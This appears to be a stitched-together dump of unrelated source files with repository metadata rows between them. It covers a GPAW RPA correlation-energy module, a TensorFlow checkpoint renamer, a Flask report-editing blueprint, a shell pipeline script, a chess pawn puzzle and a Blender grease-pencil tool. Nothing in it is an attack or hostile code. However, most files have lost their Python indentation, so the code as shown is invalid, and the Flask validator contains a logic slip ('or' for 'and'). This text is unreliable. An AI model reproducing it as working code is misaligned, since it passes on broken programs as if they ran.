wcomm = 1
if isinstance(wcomm, int):
if wcomm == 1:
wcomm = mpi.serial_comm
chicomm = world
else:
r = world.rank
s = world.size
assert s % wcomm == 0
n = s // wcomm # size of skncomm
wcomm = world.new_communicator(range(r % n, s, n))
chicomm = world.new_communicator(range(r // n * n,
(r // n + 1) * n))
assert len(self.omega_w) % wcomm.size == 0
self.mynw = len(self.omega_w) // wcomm.size
self.w1 = wcomm.rank * self.mynw
self.w2 = self.w1 + self.mynw
self.myomega_w = self.omega_w[self.w1:self.w2]
self.wcomm = wcomm
self.chicomm = chicomm
self.world = world
self.skip_gamma = skip_gamma
self.ibzq_qc = None
self.weight_q = None
self.initialize_q_points(qsym)
# Energies for all q-vetors and cutoff energies:
self.energy_qi = []
self.filename = filename
self.print_initialization(xc, frequency_scale, nlambda, user_spec)
def initialize_q_points(self, qsym):
kd = self.calc.wfs.kd
self.bzq_qc = kd.get_bz_q_points(first=True)
if not qsym:
self.ibzq_qc = self.bzq_qc
self.weight_q = np.ones(len(self.bzq_qc)) / len(self.bzq_qc)
else:
U_scc = kd.symmetry.op_scc
self.ibzq_qc = kd.get_ibz_q_points(self.bzq_qc, U_scc)[0]
self.weight_q = kd.q_weights
def read(self):
lines = open(self.filename).readlines()[1:]
n = 0
self.energy_qi = []
nq = len(lines) // len(self.ecut_i)
for q_c in self.ibzq_qc[:nq]:
self.energy_qi.append([])
for ecut in self.ecut_i:
q1, q2, q3, ec, energy = [float(x)
for x in lines[n].split()]
self.energy_qi[-1].append(energy / Hartree)
n += 1
if (abs(q_c - (q1, q2, q3)).max() > 1e-4 or
abs(int(ecut * Hartree) - ec) > 0):
self.energy_qi = []
return
print('Read %d q-points from file: %s' % (nq, self.filename),
file=self.fd)
print(file=self.fd)
def write(self):
if self.world.rank == 0 and self.filename:
fd = open(self.filename, 'w')
print('#%9s %10s %10s %8s %12s' %
('q1', 'q2', 'q3', 'E_cut', 'E_c(q)'), file=fd)
for energy_i, q_c in zip(self.energy_qi, self.ibzq_qc):
for energy, ecut in zip(energy_i, self.ecut_i):
print('%10.4f %10.4f %10.4f %8d %r' %
(tuple(q_c) + (ecut * Hartree, energy * Hartree)),
file=fd)
def calculate(self, ecut, nbands=None, spin=0):
"""Calculate RPA correlation energy for one or several cutoffs.
ecut: float or list of floats
Plane-wave cutoff(s).
nbands: int
Number of bands (defaults to number of plane-waves).
spin: separate spin in response funtion.
(Only needed for beyond RPA methods that inherit this function)
"""
if isinstance(ecut, (float, int)):
ecut_i = [ecut]
for i in range(5):
ecut_i.append(ecut_i[-1] * 0.8)
ecut_i = np.sort(ecut_i)
else:
ecut_i = np.sort(ecut)
self.ecut_i = np.asarray(ecut_i) / Hartree
ecutmax = max(self.ecut_i)
if nbands is None:
print('Response function bands : Equal to number of plane waves',
file=self.fd)
else:
print('Response function bands : %s' % nbands, file=self.fd)
print('Plane wave cutoffs (eV) :', end='', file=self.fd)
for ecut in ecut_i:
print('%5d' % ecut, end='', file=self.fd)
print(file=self.fd)
print(file=self.fd)
if self.filename and os.path.isfile(self.filename):
self.read()
self.world.barrier()
chi0 = Chi0(self.calc, 1j * Hartree * self.myomega_w, eta=0.0,
intraband=False, hilbert=False,
txt='response.txt', world=self.chicomm)
nq = len(self.energy_qi)
for q_c in self.ibzq_qc[nq:]:
if np.allclose(q_c, 0.0) and self.skip_gamma:
self.energy_qi.append(len(self.ecut_i) * [0.0])
self.write()
print('Not calculating E_c(q) at Gamma', file=self.fd)
print(file=self.fd)
continue
thisqd = KPointDescriptor([q_c])
pd = PWDescriptor(ecutmax, self.calc.wfs.gd, complex, thisqd)
nG = pd.ngmax
chi0_swGG = np.zeros((1 + spin, self.mynw, nG, nG), complex)
if np.allclose(q_c, 0.0):
# Wings (x=0,1) and head (G=0) for optical limit and three
# directions (v=0,1,2):
chi0_swxvG = np.zeros((1 + spin, self.mynw, 2, 3, nG), complex)
chi0_swvv = np.zeros((1 + spin, self.mynw, 3, 3), complex)
else:
chi0_swxvG = None
chi0_swvv = None
Q_aGii = chi0.initialize_paw_corrections(pd)
# First not completely filled band:
m1 = chi0.nocc1
print('# %s - %s' % (len(self.energy_qi), ctime().split()[-2]),
file=self.fd)
print('q = [%1.3f %1.3f %1.3f]' % tuple(q_c), file=self.fd)
energy_i = []
for ecut in self.ecut_i:
if ecut == ecutmax:
# Nothing to cut away:
cut_G = None
m2 = nbands or nG
else:
cut_G = np.arange(nG)[pd.G2_qG[0] <= 2 * ecut]
m2 = len(cut_G)
print('E_cut = %d eV / Bands = %d: ' % (ecut * Hartree, m2),
file=self.fd, end='')
self.fd.flush()
energy = self.calculate_q(chi0, pd,
chi0_swGG, chi0_swxvG, chi0_swvv,
Q_aGii, m1, m2, cut_G)
energy_i.append(energy)
m1 = m2
if ecut < ecutmax and self.chicomm.size > 1:
# Chi0 will be summed again over chicomm, so we divide
# by its size:
chi0_swGG *= 1.0 / self.chicomm.size
if chi0_swxvG is not None:
chi0_swxvG *= 1.0 / self.chicomm.size
chi0_swvv *= 1.0 / self.chicomm.size
self.energy_qi.append(energy_i)
self.write()
print(file=self.fd)
e_i = np.dot(self.weight_q, np.array(self.energy_qi))
print('==========================================================',
file=self.fd)
print(file=self.fd)
print('Total correlation energy:', file=self.fd)
for e_cut, e in zip(self.ecut_i, e_i):
print('%6.0f: %6.4f eV' % (e_cut * Hartree, e * Hartree),
file=self.fd)
print(file=self.fd)
self.energy_qi = [] # important if another calculation is performed
if len(e_i) > 1:
self.extrapolate(e_i)
print('Calculation completed at: ', ctime(), file=self.fd)
print(file=self.fd)
return e_i * Hartree
def calculate_q(self, chi0, pd,
chi0_swGG, chi0_swxvG, chi0_swvv, Q_aGii, m1, m2, cut_G):
chi0_wGG = chi0_swGG[0]
if chi0_swxvG is not None:
chi0_wxvG = chi0_swxvG[0]
chi0_wvv = chi0_swvv[0]
else:
chi0_wxvG = None
chi0_wvv = None
chi0._calculate(pd, chi0_wGG, chi0_wxvG, chi0_wvv,
Q_aGii, m1, m2, [0, 1])
print('E_c(q) = ', end='', file=self.fd)
if not pd.kd.gamma:
e = self.calculate_energy(pd, chi0_wGG, cut_G)
print('%.3f eV' % (e * Hartree), file=self.fd)
self.fd.flush()
else:
e = 0.0
for v in range(3):
chi0_wGG[:, 0] = chi0_wxvG[:, 0, v]
chi0_wGG[:, :, 0] = chi0_wxvG[:, 1, v]
chi0_wGG[:, 0, 0] = chi0_wvv[:, v, v]
ev = self.calculate_energy(pd, chi0_wGG, cut_G)
e += ev
print('%.3f' % (ev * Hartree), end='', file=self.fd)
if v < 2:
print('/', end='', file=self.fd)
else:
print(' eV', file=self.fd)
self.fd.flush()
e /= 3
return e
def calculate_energy(self, pd, chi0_wGG, cut_G):
"""Evaluate correlation energy from chi0."""
G_G = pd.G2_qG[0]**0.5 # |G+q|
if pd.kd.gamma:
G_G[0] = 1.0
if cut_G is not None:
G_G = G_G[cut_G]
nG = len(G_G)
e_w = []
for chi0_GG in chi0_wGG:
if cut_G is not None:
chi0_GG = chi0_GG.take(cut_G, 0).take(cut_G, 1)
e_GG = np.eye(nG) - 4 * np.pi * chi0_GG / G_G / G_G[:, np.newaxis]
e = np.log(np.linalg.det(e_GG)) + nG - np.trace(e_GG)
e_w.append(e.real)
E_w = np.zeros_like(self.omega_w)
self.wcomm.all_gather(np.array(e_w), E_w)
energy = np.dot(E_w, self.weight_w) / (2 * np.pi)
self.E_w = E_w
return energy
def extrapolate(self, e_i):
print('Extrapolated energies:', file=self.fd)
ex_i = []
for i in range(len(e_i) - 1):
e1, e2 = e_i[i:i + 2]
x1, x2 = self.ecut_i[i:i + 2]**-1.5
ex = (e1 * x2 - e2 * x1) / (x2 - x1)
ex_i.append(ex)
print(' %4.0f -%4.0f: %5.3f eV' % (self.ecut_i[i] * Hartree,
self.ecut_i[i + 1] * Hartree,
ex * Hartree),
file=self.fd)
print(file=self.fd)
self.fd.flush()
return e_i * Hartree
def print_initialization(self, xc, frequency_scale, nlambda, user_spec):
print('----------------------------------------------------------',
file=self.fd)
print('Non-self-consistent %s correlation energy' % xc, file=self.fd)
print('----------------------------------------------------------',
file=self.fd)
print('Started at: ', ctime(), file=self.fd)
print(file=self.fd)
print('Atoms :',
self.calc.atoms.get_chemical_formula(mode='hill'), file=self.fd)
print('Ground state XC functional :',
self.calc.hamiltonian.xc.name, file=self.fd)
print('Valence electrons :',
self.calc.wfs.setups.nvalence, file=self.fd)
print('Number of bands :',
self.calc.wfs.bd.nbands, file=self.fd)
print('Number of spins :',
self.calc.wfs.nspins, file=self.fd)
print('Number of k-points :',
len(self.calc.wfs.kd.bzk_kc), file=self.fd)
print('Number of irreducible k-points :',
len(self.calc.wfs.kd.ibzk_kc), file=self.fd)
print('Number of q-points :',
len(self.bzq_qc), file=self.fd)
print('Number of irreducible q-points :',
len(self.ibzq_qc), file=self.fd)
print(file=self.fd)
for q, weight in zip(self.ibzq_qc, self.weight_q):
print(' q: [%1.4f %1.4f %1.4f] - weight: %1.3f' %
(q[0], q[1], q[2], weight), file=self.fd)
print(file=self.fd)
print('----------------------------------------------------------',
file=self.fd)
print('----------------------------------------------------------',
file=self.fd)
print(file=self.fd)
if nlambda is None:
print('Analytical coupling constant integration', file=self.fd)
else:
print('Numerical coupling constant integration using', nlambda,
'Gauss-Legendre points', file=self.fd)
print(file=self.fd)
print('Frequencies', file=self.fd)
if not user_spec:
print(' Gauss-Legendre integration with %s frequency points' %
len(self.omega_w), file=self.fd)
print(' Transformed from [0,oo] to [0,1] using e^[-aw^(1/B)]',
file=self.fd)
print(' Highest frequency point at %5.1f eV and B=%1.1f' %
(self.omega_w[-1] * Hartree, frequency_scale), file=self.fd)
else:
print(' User specified frequency integration with',
len(self.omega_w), 'frequency points', file=self.fd)
print(file=self.fd)
print('Parallelization', file=self.fd)
print(' Total number of CPUs : % s' % self.world.size,
file=self.fd)
print(' Frequency decomposition : % s' % self.wcomm.size,
file=self.fd)
print(' K-point/band decomposition : % s' % self.chicomm.size,
file=self.fd)
print(file=self.fd)
def get_gauss_legendre_points(nw=16, frequency_max=800.0, frequency_scale=2.0):
y_w, weights_w = p_roots(nw)
y_w = y_w.real
ys = 0.5 - 0.5 * y_w
ys = ys[::-1]
w = (-np.log(1 - ys))**frequency_scale
w *= frequency_max / w[-1]
alpha = (-np.log(1 - ys[-1]))**frequency_scale / frequency_max
transform = (-np.log(1 - ys))**(frequency_scale - 1) \
/ (1 - ys) * frequency_scale / alpha
return w, weights_w * transform / 2
| gpl-3.0 | -8,841,506,788,400,135,000 | 36.929095 | 79 | 0.474634 | false | 3.340439 | false | false | false |
justanothercoder/LSTM-Optimizer-TF | scripts/tensorflow_rename_variables.py | 1 | 2707 | import os
os.environ["CUDA_VISIBLE_DEVICES"] = ""
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'
import sys, getopt
import tensorflow as tf
usage_str = 'python tensorflow_rename_variables.py --checkpoint_dir=path/to/dir/ ' \
'--replace_from=substr --replace_to=substr --add_prefix=abc --dry_run'
def rename(checkpoint_dir, replace_from, replace_to, add_prefix, dry_run):
checkpoint = tf.train.get_checkpoint_state(checkpoint_dir)
with tf.Session() as sess:
for var_name, _ in tf.contrib.framework.list_variables(checkpoint_dir):
# Load the variable
var = tf.contrib.framework.load_variable(checkpoint_dir, var_name)
print(var_name)
# Set the new name
new_name = var_name
if None not in [replace_from, replace_to]:
new_name = new_name.replace(replace_from, replace_to)
if add_prefix:
new_name = add_prefix + new_name
#if new_name == var_name:
# continue
if dry_run:
if var_name != new_name:
print('%s would be renamed to %s.' % (var_name, new_name))
else:
if var_name != new_name:
print('Renaming %s to %s.' % (var_name, new_name))
# Rename the variable
var = tf.Variable(var, name=new_name)
if not dry_run:
# Save the variables
saver = tf.train.Saver()
sess.run(tf.global_variables_initializer())
saver.save(sess, checkpoint.model_checkpoint_path)
def main(argv):
checkpoint_dir = None
replace_from = None
replace_to = None
add_prefix = None
dry_run = False
try:
opts, args = getopt.getopt(argv, 'h', ['help=', 'checkpoint_dir=', 'replace_from=',
'replace_to=', 'add_prefix=', 'dry_run'])
except getopt.GetoptError:
print(usage_str)
sys.exit(2)
for opt, arg in opts:
if opt in ('-h', '--help'):
print(usage_str)
sys.exit()
elif opt == '--checkpoint_dir':
checkpoint_dir = arg
elif opt == '--replace_from':
replace_from = arg
elif opt == '--replace_to':
replace_to = arg
elif opt == '--add_prefix':
add_prefix = arg
elif opt == '--dry_run':
dry_run = True
if not checkpoint_dir:
print('Please specify a checkpoint_dir. Usage:')
print(usage_str)
sys.exit(2)
rename(checkpoint_dir, replace_from, replace_to, add_prefix, dry_run)
if __name__ == '__main__':
main(sys.argv[1:])
| mit | -4,302,017,214,150,975,500 | 31.614458 | 91 | 0.536757 | false | 3.812676 | false | false | false |
mozilla/user-advocacy | flask/useradvocacy/reports/views.py | 1 | 12475 | # -*- coding: utf-8 -*-
'''Templating engine for reports'''
from flask import (current_app, Flask, Blueprint, request, render_template, url_for, flash, redirect, session, send_from_directory, safe_join, Response, jsonify)
from werkzeug.exceptions import Unauthorized, Forbidden, NotFound, BadRequest, Conflict
from useradvocacy.extensions import login_manager
from flask.ext.login import current_user
from useradvocacy.user.models import User
from useradvocacy.database import db
from useradvocacy.reports.models import User, Template, Report
from .forms import EditorForm, SelectorForm, PreviewForm
from useradvocacy.utils import flash_errors, check_admin
import os
import re
import flask.json
from functools import wraps
from werkzeug.utils import secure_filename
from .markdown2html import convert_md
import shutil
from flask.ext.login import login_required
blueprint = Blueprint('reports', __name__, static_folder="./static",
url_prefix="/reports", template_folder="./templates")
def upload_path():
if current_app.config['UPLOAD_PATH']:
upload = os.path.join(current_app.config['UPLOAD_PATH'], 'reports')
else:
upload = os.path.join(current_app.root_path, 'reports', 'uploads')
print upload
return upload
def validate_project_filename(fn):
@wraps(fn)
def new_fn(project, filename, *args, **kwargs):
if re.match('[a-zA-Z0-9_-]+$',project) or re.match('[a-zA-Z0-9_-]+$',filename):
return fn(project, filename, *args, **kwargs)
else:
raise BadRequest()
return new_fn
def allowed_file(name):
if re.match('[^/.\'\\\\"]+\\.(css|js|png|jpg|jpeg|gif|json|csv|tsv|xml|pdf|key)$', name, flags=re.IGNORECASE):
return True
else:
return False
@blueprint.route("/", methods=["GET"])
def home():
reports = Report.query.order_by("updated").all()
reports.reverse()
projects = db.session.query(Report.project.label('name'), db.func.bit_or(db.and_(Report.published, Report.listed)).label('shown')).group_by('name').all()
print projects[0].shown
return render_template('reports.html', list = reports, projects = projects)
@blueprint.route("/css/<file>", methods=["GET"])
def serve_css(file):
return send_from_directory(safe_join(current_app.root_path, "reports/static/css"), file)
@blueprint.route("/img/<file>", methods=["GET"])
def serve_img(file):
return send_from_directory(safe_join(current_app.root_path, "reports/static/img"), file)
@blueprint.route("/js/<file>", methods=["GET"])
def serve_js(file):
return send_from_directory(safe_join(current_app.root_path, "reports/static/js"), file)
@blueprint.route("/edit", methods=["GET", "POST"])
@login_required
@check_admin
def selector():
form = SelectorForm()
if request.method == 'POST':
if form.validate_on_submit():
if form.action == "report":
return redirect('/reports/' + form.project + '/' + form.filename
+ '/edit', 302)
if form.action == "rerender":
reports = Report.query.all()
for report in reports:
report.save_render_html()
else:
flash_errors(form)
return render_template('selector.html',form=form)
# TODO: rewrite API.json to take parameters instead of just returning.
# TODO: return metadata along with individual reports.
# (see also: home_project_api())
@blueprint.route("/api.json", methods=["GET"])
def home_api():
reports = Report.query.order_by("updated").limit(100).all()
result = []
for report in reports:
if (not (current_user and current_user.is_authenticated() and
current_user.is_admin)
and not report.published):
continue
item = {
'path' : url_for(".home") + str(report),
'filename' : report.filename,
'project' : report.project,
'created' : report.created,
'updated' : report.updated,
'title' : report.title
}
result.append(item)
return jsonify(results = result)
@blueprint.route("/<project>/", methods=["GET"])
def home_project(project):
return redirect(url_for(".home") + "#" + project)
@blueprint.route("/<project>/api.json", methods=["GET"])
def home_project_api(project):
reports = Report.query.filter_by(project = project).order_by("updated").all()
result = []
for report in reports:
if (not (current_user and current_user.is_authenticated() and
current_user.is_admin)
and not report.published):
continue
item = {
'path' : url_for(".home") + str(report),
'filename' : report.filename,
'project' : report.project,
'created' : report.created,
'updated' : report.updated,
'title' : report.title
}
result.append(item)
return jsonify(results = result)
@blueprint.route("/<project>/<filename>/", methods=["GET", "POST"])
@validate_project_filename
def display(project, filename):
report = Report.query.filter_by(filename = filename, project = project).first()
if report:
if report.published or (not current_user.is_anonymous() and
current_user.is_admin):
return report.html_content
else:
raise NotFound()
else:
raise NotFound()
@blueprint.route("/<project>/<filename>/edit", methods=["GET", "POST"])
@validate_project_filename
@login_required
@check_admin
def edit(project, filename):
template_name = request.args.get('template', 'default')
report = Report.query.filter_by(project = project, filename = filename).first()
default_template = Template.query.filter_by(name = template_name).first()
form = None
if report:
form = EditorForm(project_field=project, filename_field=filename,
template_field = report.template, markdown_field=report.md_content,
published_field = report.published, listed_field = report.listed)
else:
form = EditorForm(project_field=project, filename_field=filename,
template_field = default_template, markdown_field=default_template.md_content)
if request.method == 'POST':
if form.validate_on_submit():
save_user = None
if current_user.is_anonymous():
save_user = User.query.filter_by(username="<blank>").first()
else:
save_user = current_user
if form.savemode is 'save':
report = Report.query.filter_by(filename = form.filename,
project = form.project).first()
if report:
report.update(template_id = form.template.id,
md_content = form.md_content,
listed = form.listed,
published = form.published)
flash("Report saved.", 'success')
else:
report = Report.create(filename = form.filename,
project = form.project, template = form.template,
md_content = form.md_content, author = save_user,
listed = form.listed, published = form.published)
flash("New report created and saved!", 'success')
report.save_render_html()
form = EditorForm(project_field=form.project,
filename_field=form.filename, template_field=form.template,
markdown_field = form.md_content, listed_field = form.listed,
published_field = form.published)
elif form.savemode is "saveas":
report = Report.create(filename = form.filename,
project = form.project, template = form.template,
md_content = form.md_content, author = save_user,
listed = form.listed, published = form.published)
report.save_render_html()
old_path = os.path.join(upload_path(), form.old_project,
form.old_filename)
new_path = os.path.join(upload_path(), form.project,
form.filename)
# Move files along with copying data
try:
files = os.listdir(old_path)
except OSError:
pass
else:
if os.path.exists(new_path):
flash("Files not copied!", 'error')
else:
shutil.copytree(old_path, new_path)
flash("Files copied!", 'success')
flash("New report created and saved!", 'success')
return redirect("/reports/" + form.project + "/" +
form.filename + "/edit", 303)
else:
assert False
else:
flash_errors(form)
preview_form = PreviewForm(markdown_preview_field = '', template_preview_field = '')
return render_template('editor.html',form=form, project=project,
filename=filename, preview_form=preview_form)
@blueprint.route("/<project>/<filename>/upload", methods=["POST"])
@validate_project_filename
@login_required
@check_admin
def upload_file(project, filename):
file = request.files['file']
if file and allowed_file(file.filename):
file_save = secure_filename(file.filename)
try:
os.makedirs(os.path.join(upload_path(), project, filename))
except OSError:
pass
try:
file.save(os.path.join(upload_path(), project, filename, file_save))
except (IOError, OSError) as err:
raise Conflict("Can't save file: " + err.strerror)
flash("Can't save file: " + err.strerror, 'error')
else:
return "File uploaded", 200
else:
raise Conflict("File upload failed: File not allowed")
raise Conflict("Bad file upload!")
@blueprint.route("/<project>/<filename>/preview", methods=["POST"])
@validate_project_filename
def preview_file(project, filename):
preview_form = PreviewForm()
if preview_form.validate_on_submit():
print preview_form.template_id
template_id = Template.query.get(preview_form.template_id)
md_content = preview_form.md_content
env = current_app.create_jinja_environment()
template = env.get_template(template_id.filename)
print template
return convert_md(md_content, template)
else:
return NotFound()
@blueprint.route("/<project>/<filename>/listfiles", methods=["GET"])
@validate_project_filename
@login_required
@check_admin
def list_files(project, filename):
try:
files = os.listdir(os.path.join(upload_path(), project, filename))
except OSError:
return Response(flask.json.dumps([]), status=200, mimetype='application/json')
out_list = []
for file_name in files:
file_item = {
"name": file_name,
"size": os.path.getsize(os.path.join(upload_path(), project,
filename))
}
out_list.append(file_item)
return Response(flask.json.dumps(out_list), status=200, mimetype='application/json')
@blueprint.route("/<project>/<filename>/md", methods=["GET"])
@validate_project_filename
def display_md(project, filename):
report = Report.query.filter_by(filename = filename, project = project).first()
if report:
return Response(report.md_content, mimetype = 'text/plain', status = 200)
else:
raise NotFound()
# Keep this function last as it sucks up everything else in /reports/
@blueprint.route("/<project>/<filename>/<file>", methods=["GET"])
@validate_project_filename
def file_server(project, filename, file):
return send_from_directory(os.path.join(upload_path(), project, filename), file)
@blueprint.route("/<project>/<filename>/<file>/delete", methods=["DELETE"])
@validate_project_filename
@login_required
@check_admin
def delete_file(project, filename, file):
if not allowed_file(file):
raise BadRequest()
if os.path.exists(os.path.join(upload_path(), project, filename,file)):
os.remove(os.path.join(upload_path(), project, filename,file))
return "File removed", 200
else:
raise NotFound()
| mpl-2.0 | -5,215,486,145,157,596,000 | 38.603175 | 161 | 0.607214 | false | 4.035911 | false | false | false |
eske/seq2seq | scripts/multi-print.py | 1 | 1271 | #!/usr/bin/python3
import argparse
import sys
import subprocess
import re
import sys
parser = argparse.ArgumentParser()
parser.add_argument('files', nargs='+')
parser.add_argument('--head', action='store_true')
parser.add_argument('--shuf', action='store_true')
parser.add_argument('-n', type=int)
parser.add_argument('-d', '--delimiter', default='^', choices=['&', '^', '@', '~', '|', '/', '#', '$'])
parser.add_argument('--space', action='store_true')
args = parser.parse_args()
commands = []
paste = ['paste', '-d', args.delimiter] + list(args.files)
commands.append(paste)
if args.shuf:
shuf = ['shuf']
if args.n:
shuf += ['-n', str(args.n)]
commands.append(shuf)
if args.head:
head = ['head', '-n', str(args.n or 10)]
commands.append(head)
if args.space:
space = ['sed', 'G']
commands.append(space)
delimiter = re.escape(args.delimiter) if args.delimiter in ('/', '^', '$') else args.delimiter
sed = ['sed', 's/{}/\\n/g'.format(delimiter)]
commands.append(sed)
ps = None
for i, cmd in enumerate(commands):
stdout = sys.stdout if i == len(commands) - 1 else subprocess.PIPE
stdin = None if i == 0 else ps.stdout
ps = subprocess.Popen(cmd, stdin=stdin, stdout=stdout, stderr=open('/dev/null', 'w'))
ps.wait()
| apache-2.0 | -607,270,027,683,511,700 | 25.479167 | 103 | 0.630999 | false | 3.130542 | false | false | false |
lisprolog/python | save_pawns.py | 1 | 1937 | def safe_pawns(pawns):
coordinates = getCoord(pawns);
listCoordinates = coordinates[0];
listSavePositions = coordinates[1];
#print(listCoordinates);
#print(listSavePositions);
safe = checkCoord(listCoordinates, listSavePositions);
return safe
# translates the chess coordinates into digits
#
def getCoord(pawns):
testpawns = ["b4", "d4", "f4", "c3", "e3", "g5", "d2"];
# (a == 0)
alpha = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h'];
# (1 == 0)
num = ['1', '2', '3', '4', '5', '6', '7', '8'];
#print(alpha.index("a"));
coordinateList = [];
saveCandidates = [];
for elem in pawns:
#print(elem[0]);
letter = elem[0];
pos_letter = alpha.index(letter);
#print(alpha.index(letter));
#print(elem[1]);
digit = elem[1];
pos_digit = num.index(digit);
#print(num.index(digit));
two = [pos_letter, pos_digit];
coordinateList.append(two);
twoCand_One = [pos_letter - 1, pos_digit + 1];
twoCand_Two = [pos_letter + 1, pos_digit + 1];
if twoCand_One not in saveCandidates:
saveCandidates.append(twoCand_One);
if twoCand_Two not in saveCandidates:
saveCandidates.append(twoCand_Two);
#saveCandidates2 = set(saveCandidates);
twoLists = [coordinateList, saveCandidates];
print (coordinateList);
print (saveCandidates);
return twoLists;
#print(coordinateList);
return coordinateList;
def checkCoord(coordinates, candidates):
count = 0;
for elem in coordinates:
if elem in candidates:
count += 1;
return count;
if __name__ == '__main__':
#These "asserts" using only for self-checking and not necessary for auto-testing
assert safe_pawns({"b4", "d4", "f4", "c3", "e3", "g5", "d2"}) == 6
assert safe_pawns({"b4", "c4", "d4", "e4", "f4", "g4", "e5"}) == 1
| bsd-3-clause | 3,029,310,417,977,442,300 | 31.830508 | 84 | 0.56634 | false | 3.180624 | false | false | false |
blendit/env | src/blender/grease_pencil.py | 1 | 10818 | import bpy
import os
import sys
import subprocess
import ast
import random
script_dir = os.path.dirname(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))
sys.path.append(script_dir)
# Get system's python path
proc = subprocess.Popen('python3 -c "import sys; print(sys.path)"', stdout=subprocess.PIPE, shell=True)
out, err = proc.communicate()
paths = ast.literal_eval(out.decode("utf-8"))
sys.path += (paths)
from shapely.geometry import Polygon
from shapely.affinity import translate
from src.blender.blend_environment import BlendEnvironment
from src.environment import Environment
from src.landscape import Mountain, MountainImg, Vegetation
from src.model import AbstractModel
from src.feature import ImageFeature
# how to deal with this ? pencil.layers[0] = GP_Layer.001, ..., pencil.layers[n-1] = GP_Layer.00n, pencil.layers[n] = GP_Layer... (but GP Layer first one)
# nb, can change gen_name(i) in id ? maybe not...
feature_list = []
model_number_list = []
image_path_list = []
# if we put feature_list into scn, it is transformed into a read-only IDPropertyArray :'(
benv = BlendEnvironment((0, 0), (0, 0))
# could probably put this in context
def upd_enum(self, context):
print(self['MyEnum'])
def update_scale(self, context):
for (s, models) in benv.models:
for model in models:
model.scale[0] = s * context.scene.model_scaling
model.scale[1] = s * context.scene.model_scaling
model.scale[2] = s * context.scene.model_scaling
def initSceneProperties(scn):
bpy.types.Scene.model_number = bpy.props.IntProperty(name="Number of models", default=20, min=1, max=400)
scn["model_number"] = 100
bpy.types.Scene.model_scaling = bpy.props.FloatProperty(name="Scaling of models", default=0.3, min=0, update=update_scale)
scn["model_scaling"] = 0.3
bpy.types.Scene.model_path = bpy.props.StringProperty(
name="Patht to models",
description="Path to models",
default="../../models/vegetation/Pine_4m.obj",
maxlen=1024,
subtype='FILE_PATH')
scn["model_path"] = "../../models/vegetation/Pine_4m.obj"
bpy.types.Scene.image_path = bpy.props.StringProperty(
name="Patht to models",
description="Path to models",
default="../../hm.png",
maxlen=1024,
subtype='FILE_PATH')
scn["image_path"] = "../../hm.png"
myItems = [('MountainImg', 'MountainImg', 'MountainImg'),
# ('Mountain', 'Mountain', 'Mountain'),
('Vegetation', 'Vegetation', 'Vegetation'),
('Image', 'Image', 'Image'),
('Urban', 'Urban', 'Urban'),
('Water', 'Water', 'Water')]
bpy.types.Scene.MyEnum = bpy.props.EnumProperty(
items=myItems,
name="Feature choice",
update=upd_enum)
scn["myItems"] = myItems
scn['MyEnum'] = 0
scn["i"] = 0
scn["models_scale"] = 1
return
def print_points():
# print points defined using pencil
for i, pencil in enumerate(bpy.data.grease_pencil[0].layers):
print("step " + str(i))
try:
for stroke in enumerate(pencil.active_frame.strokes):
stroke_points = pencil.active_frame.strokes[0].points
for point in stroke_points:
print("\t(" + str(point.co.x) + ", " + str(point.co.y) + ", " + str(point.co.z) + ")")
except AttributeError:
print("\tempty")
def gen_name(i):
if(i == 0):
name = "GP_Layer"
else:
name = "GP_Layer." + "{0:0=3d}".format(i)
return name
def change_color(i):
name = gen_name(i)
bpy.data.grease_pencil["GPencil"].layers[name].fill_color = (random.random(), random.random(), random.random())
print("colors " + str(bpy.data.grease_pencil["GPencil"].layers[name].fill_color[0]) +
" " + str(bpy.data.grease_pencil["GPencil"].layers[name].fill_color[1]) +
" " + str(bpy.data.grease_pencil["GPencil"].layers[name].fill_color[2]))
bpy.data.grease_pencil["GPencil"].layers[name].fill_alpha = 1
def dist(a, b):
return (a[0] - b[0])**2 + (a[1] - b[1])**2
def gen_feature(feature_name, model_number, image_path, shape, transl, scaling, scn):
print("Called gen_feature @ %s" % feature_name)
# let's first translate our feature.
ip = Polygon(list(shape)) # map(lambda x: (x[0], 4x[1]), shape)))
p = translate(ip, xoff=transl[0], yoff=transl[1])
if(feature_name == "Mountain"):
center_z = 0
center_pos = p.centroid.coords[0]
rd = int((max([dist(x, center_pos) for x in p.exterior.coords]) / 2) ** 0.5)
print("Radius = %d" % rd)
print("Center = %d, %d" % (center_pos[0], center_pos[1]))
return Mountain(rd, center_z, center_pos)
elif(feature_name == "MountainImg"):
center_z = 0
center_pos = p.bounds[0:2]
print("Center = %d, %d" % (center_pos[0], center_pos[1]))
return MountainImg(p, center=center_pos)
elif(feature_name == "Roads"):
pass
elif(feature_name == "Image"):
f = ImageFeature(image_path)
f.shape = p
return f
elif(feature_name == "Vegetation"):
for a in p.exterior.coords:
print(a)
return Vegetation(p, model=AbstractModel(scn["model_path"], 0.02, (0, 0)), tree_number=model_number)
elif(feature_name == "Urban"):
pass
elif(feature_name == "WaterArea"):
pass
elif(feature_name == "River"):
pass
class OBJECT_OT_ToolsButton(bpy.types.Operator):
bl_idname = "drawenv.execute"
bl_label = "Draw something"
def execute(self, context):
self.report({'INFO'}, "starting drawing")
bpy.ops.view3d.viewnumpad(type='TOP', align_active=False)
bpy.ops.gpencil.draw('INVOKE_REGION_WIN', mode="DRAW_POLY")
change_color(context.scene["i"])
return {'FINISHED'}
class OBJECT_OT2_ToolsButton(bpy.types.Operator):
bl_idname = "drawenv.stop"
bl_label = "Done"
def execute(self, context):
scn = context.scene
self.report({'INFO'}, "stopping drawing")
# We add this new feature
# We should translate everything, here or when exporting the env
# Idea : find bounding box, and translate 2 times...
# shape_2d = [(p.co.x, p.co.y) for p in bpy.data.grease_pencil[0].layers[scn["i"]].active_frame.strokes[0].points]
# feature_list.append(gen_feature(scn["myItems"][scn["MyEnum"]][0], shape_2d))
feature_list.append(scn["myItems"][scn["MyEnum"]][0])
model_number_list.append(scn["model_number"])
image_path_list.append(scn["image_path"])
scn["i"] += 1
bpy.ops.gpencil.layer_add()
return {'FINISHED'}
class OBJECT_OT3_ToolsButton(bpy.types.Operator):
bl_idname = "drawenv.print"
bl_label = "Print points"
def execute(self, context):
print_points()
return {'FINISHED'}
class OBJECT_OT4_ToolsButton(bpy.types.Operator):
bl_idname = "drawenv.hide"
bl_label = "Hide/unhide gpencil"
def execute(self, context):
scn = context.scene
for i in range(scn["i"]):
bpy.data.grease_pencil[0].layers[i].hide = not bpy.data.grease_pencil["GPencil"].layers[i].hide
